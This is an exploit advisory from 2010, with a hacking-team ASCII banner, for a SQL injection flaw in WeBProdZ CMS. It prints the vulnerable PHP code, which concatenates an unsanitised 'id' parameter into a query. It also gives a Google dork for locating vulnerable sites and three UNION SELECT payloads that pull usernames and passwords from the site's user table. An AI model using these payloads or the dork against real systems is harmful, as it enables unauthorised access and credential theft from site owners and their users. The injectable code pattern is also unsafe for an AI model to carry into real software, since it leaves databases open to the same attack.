______                _       _   _             
      | ___ \              | |     | | (_)            
      | |_/ /_____   _____ | |_   _| |_ _  ___  _ __  
      |    // _ \ \ / / _ \| | | | | __| |/ _ \| '_ \   
      | |\ \  __/\ V / (_) | | |_| | |_| | (_) | | | |   
      \_| \_\___| \_/ \___/|_|\__,_|\__|_|\___/|_| |_| 

        _____                      _____  _____ 
       |_   _|                    |  _  ||  _  |
         | | ___  __ _ _ __ ___   | |/' || |_| |
         | |/ _ \/ _` | '_ ` _ \  |  /| |\____ |
         | |  __/ (_| | | | | | | \ |_/ /.___/ /
         \_/\___|\__,_|_| |_| |_|  \___/ \____/

_____________________________________________________________
   
[$] Exploit Title     : WeBProdZ CMS SQL Injection Vulnerability
[$] Date              : 06-05-2010            
[$] Author            : MasterGipy
[$] Email             : mastergipy [at] gmail.com
[$] Bug               : SQL Injection Vulnerability
[$] Google Dork       : "Desenvolvido por WeBProdZ"

[$] Vulnerable code in /backoffice/textos/editar.php

<?php 
    include_once("../../ligacao/connDB.php");
    $sql = "select * from textos where idtextos=".$_GET["id"];
        
    $j2 = mysql_query($sql);
    $o=mysql_fetch_object($j2);
?>

[$] Exploit

[+] http://example.pt/backoffice/textos/editar.php?id=1  <- SQL

[+] sql_1: -1 UNION ALL SELECT 1,2,3--
[+] sql_2: -1 UNION ALL SELECT 1,2,concat(username,char(58),password)+from+utilizadores--
[+] sql_3: -1 UNION ALL SELECT 1,2,concat(username,char(58),password_ori)+from+utilizadores--


[$] Greetings from PORTUGAL ^^